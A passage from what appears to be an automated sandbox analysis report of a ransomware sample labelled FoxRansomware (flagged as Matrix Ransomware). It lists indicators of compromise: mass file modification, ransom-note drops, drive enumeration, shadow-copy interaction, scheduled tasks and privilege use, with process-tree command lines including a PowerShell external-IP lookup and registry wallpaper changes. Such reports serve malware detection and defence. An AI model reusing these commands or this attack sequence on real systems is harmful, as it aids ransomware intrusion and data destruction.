for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2RM92H5V\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BB4W7M7Z\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\X: NDS5iFeg64.exe File opened (read-only) \??\K: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\N: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: NDS5iFeg64.exe File opened (read-only) \??\K: NDS5iFeg64.exe File opened (read-only) \??\L: NDS5iFeg64.exe File opened (read-only) \??\W: NDS5iFeg64.exe File opened (read-only) \??\Z: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\Z: NDS5iFeg64.exe File opened (read-only) \??\U: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\B: NDS5iFeg64.exe File opened (read-only) \??\E: NDS5iFeg64.exe File opened (read-only) \??\J: NDS5iFeg64.exe File opened (read-only) \??\T: NDS5iFeg64.exe File opened (read-only) \??\Y: NDS5iFeg64.exe File opened (read-only) \??\W: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\T: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: NDS5iFeg64.exe File opened (read-only) \??\R: NDS5iFeg64.exe File opened (read-only) \??\X: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\O: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\A: NDS5iFeg64.exe File opened (read-only) \??\I: NDS5iFeg64.exe File opened (read-only) \??\O: NDS5iFeg64.exe File opened (read-only) \??\U: NDS5iFeg64.exe File opened (read-only) \??\V: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: NDS5iFeg64.exe File opened (read-only) \??\M: NDS5iFeg64.exe File opened (read-only) \??\V: NDS5iFeg64.exe File opened (read-only) \??\S: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\Y: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\M: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\L: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\N: NDS5iFeg64.exe File opened (read-only) \??\Q: NDS5iFeg64.exe File opened (read-only) \??\S: NDS5iFeg64.exe File opened (read-only) \??\Q: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\5iAjrOSD.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ru.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\FreeCell\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\de-DE\Mahjong.exe.mui 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Mahjong\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Google\Update\Install\{5CF72A45-AD68-472B-BBFF-38A947BD74EE}\chrome_installer.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\ShvlRes.dll.mui 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2932 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3252 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2916 powershell.exe 5400 NDS5iFeg64.exe 5400 NDS5iFeg64.exe 5400 NDS5iFeg64.exe 5400 NDS5iFeg64.exe 5400 NDS5iFeg64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5400 NDS5iFeg64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 5400 NDS5iFeg64.exe Token: SeLoadDriverPrivilege 5400 NDS5iFeg64.exe Token: SeBackupPrivilege 5524 vssvc.exe Token: SeRestorePrivilege 5524 vssvc.exe Token: SeAuditPrivilege 5524 vssvc.exe Token: SeIncreaseQuotaPrivilege 6384 WMIC.exe Token: SeSecurityPrivilege 6384 WMIC.exe Token: SeTakeOwnershipPrivilege 6384 WMIC.exe Token: SeLoadDriverPrivilege 6384 WMIC.exe Token: SeSystemProfilePrivilege 6384 WMIC.exe Token: SeSystemtimePrivilege 6384 WMIC.exe Token: SeProfSingleProcessPrivilege 6384 WMIC.exe Token: SeIncBasePriorityPrivilege 6384 WMIC.exe Token: SeCreatePagefilePrivilege 6384 WMIC.exe Token: SeBackupPrivilege 6384 WMIC.exe Token: SeRestorePrivilege 6384 WMIC.exe Token: SeShutdownPrivilege 6384 WMIC.exe Token: SeDebugPrivilege 6384 WMIC.exe Token: SeSystemEnvironmentPrivilege 6384 WMIC.exe Token: SeRemoteShutdownPrivilege 6384 WMIC.exe Token: SeUndockPrivilege 6384 WMIC.exe Token: SeManageVolumePrivilege 6384 WMIC.exe Token: 33 6384 WMIC.exe Token: 34 6384 WMIC.exe Token: 35 6384 WMIC.exe Token: SeIncreaseQuotaPrivilege 6384 WMIC.exe Token: SeSecurityPrivilege 6384 WMIC.exe Token: SeTakeOwnershipPrivilege 6384 WMIC.exe Token: SeLoadDriverPrivilege 6384 WMIC.exe Token: SeSystemProfilePrivilege 6384 WMIC.exe Token: SeSystemtimePrivilege 6384 WMIC.exe Token: SeProfSingleProcessPrivilege 6384 WMIC.exe Token: SeIncBasePriorityPrivilege 6384 WMIC.exe Token: SeCreatePagefilePrivilege 6384 WMIC.exe Token: SeBackupPrivilege 6384 WMIC.exe Token: SeRestorePrivilege 6384 WMIC.exe Token: SeShutdownPrivilege 6384 WMIC.exe Token: SeDebugPrivilege 6384 WMIC.exe Token: SeSystemEnvironmentPrivilege 6384 WMIC.exe Token: SeRemoteShutdownPrivilege 6384 WMIC.exe Token: SeUndockPrivilege 6384 WMIC.exe Token: SeManageVolumePrivilege 6384 WMIC.exe Token: 33 6384 WMIC.exe Token: 34 6384 WMIC.exe Token: 35 6384 WMIC.exe Token: SeTakeOwnershipPrivilege 800 takeown.exe Token: SeTakeOwnershipPrivilege 2812 takeown.exe Token: SeTakeOwnershipPrivilege 2700 takeown.exe Token: SeTakeOwnershipPrivilege 2260 takeown.exe Token: SeTakeOwnershipPrivilege 2968 takeown.exe Token: SeTakeOwnershipPrivilege 3436 takeown.exe Token: SeTakeOwnershipPrivilege 3408 takeown.exe Token: SeTakeOwnershipPrivilege 1520 takeown.exe Token: SeTakeOwnershipPrivilege 3324 takeown.exe Token: SeTakeOwnershipPrivilege 4424 takeown.exe Token: SeTakeOwnershipPrivilege 2448 takeown.exe Token: SeTakeOwnershipPrivilege 3476 takeown.exe Token: SeTakeOwnershipPrivilege 5228 takeown.exe Token: SeTakeOwnershipPrivilege 5940 takeown.exe Token: SeTakeOwnershipPrivilege 6064 takeown.exe Token: SeTakeOwnershipPrivilege 5844 takeown.exe Token: SeTakeOwnershipPrivilege 6212 takeown.exe Token: SeTakeOwnershipPrivilege 6272 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2100 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 29 PID 2168 wrote to memory of 2100 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 29 PID 2168 wrote to memory of 2100 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 29 PID 2168 wrote to memory of 2100 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 29 PID 2168 wrote to memory of 2612 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 31 PID 2168 wrote to memory of 2612 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 31 PID 2168 wrote to memory of 2612 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 31 PID 2168 wrote to memory of 2612 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 31 PID 2168 wrote to memory of 2656 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 33 PID 2168 wrote to memory of 2656 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 33 PID 2168 wrote to memory of 2656 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 33 PID 2168 wrote to memory of 2656 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 33 PID 2656 wrote to memory of 2916 2656 cmd.exe 35 PID 2656 wrote to memory of 2916 2656 cmd.exe 35 PID 2656 wrote to memory of 2916 2656 cmd.exe 35 PID 2656 wrote to memory of 2916 2656 cmd.exe 35 PID 2168 wrote to memory of 1548 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 36 PID 2168 wrote to memory of 1548 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 36 PID 2168 wrote to memory of 1548 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 36 PID 2168 wrote to memory of 1548 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 36 PID 2168 wrote to memory of 2680 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 2168 wrote to memory of 2680 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 2168 wrote to memory of 2680 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 2168 wrote to memory of 2680 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 37 PID 1548 wrote to memory of 1976 1548 cmd.exe 40 PID 1548 wrote to memory of 1976 1548 cmd.exe 40 PID 1548 wrote to memory of 1976 1548 cmd.exe 40 PID 1548 wrote to memory of 1976 1548 cmd.exe 40 PID 2680 wrote to memory of 1056 2680 cmd.exe 41 PID 2680 wrote to memory of 1056 2680 cmd.exe 41 PID 2680 wrote to memory of 1056 2680 cmd.exe 41 PID 2680 wrote to memory of 1056 2680 cmd.exe 41 PID 1548 wrote to memory of 1100 1548 cmd.exe 42 PID 1548 wrote to memory of 1100 1548 cmd.exe 42 PID 1548 wrote to memory of 1100 1548 cmd.exe 42 PID 1548 wrote to memory of 1100 1548 cmd.exe 42 PID 2168 wrote to memory of 1324 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 2168 wrote to memory of 1324 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 2168 wrote to memory of 1324 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 2168 wrote to memory of 1324 2168 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 43 PID 1548 wrote to memory of 2520 1548 cmd.exe 44 PID 1548 wrote to memory of 2520 1548 cmd.exe 44 PID 1548 wrote to memory of 2520 1548 cmd.exe 44 PID 1548 wrote to memory of 2520 1548 cmd.exe 44 PID 1056 wrote to memory of 2136 1056 wscript.exe 46 PID 1056 wrote to memory of 2136 1056 wscript.exe 46 PID 1056 wrote to memory of 2136 1056 wscript.exe 46 PID 1056 wrote to memory of 2136 1056 wscript.exe 46 PID 1324 wrote to memory of 320 1324 cmd.exe 47 PID 1324 wrote to memory of 320 1324 cmd.exe 47 PID 1324 wrote to memory of 320 1324 cmd.exe 47 PID 1324 wrote to memory of 320 1324 cmd.exe 47 PID 2136 wrote to memory of 2932 2136 cmd.exe 50 PID 2136 wrote to memory of 2932 2136 cmd.exe 50 PID 2136 wrote to memory of 2932 2136 cmd.exe 50 PID 2136 wrote to memory of 2932 2136 cmd.exe 50 PID 1324 wrote to memory of 1564 1324 cmd.exe 49 PID 1324 wrote to memory of 1564 1324 cmd.exe 49 PID 1324 wrote to memory of 1564 1324 cmd.exe 49 PID 1324 wrote to memory of 1564 1324 cmd.exe 49 PID 1324 wrote to memory of 1172 1324 cmd.exe 51 PID 1324 wrote to memory of 1172 1324 cmd.exe 51 PID 1324 wrote to memory of 1172 1324 cmd.exe 51 PID 1324 wrote to memory of 1172 1324 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWJADauI.exe"2⤵PID:2100
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWJADauI.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWJADauI.exe" -n2⤵
- Executes dropped EXE
PID:2612
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1T6dlbXS.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5iAjrOSD.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
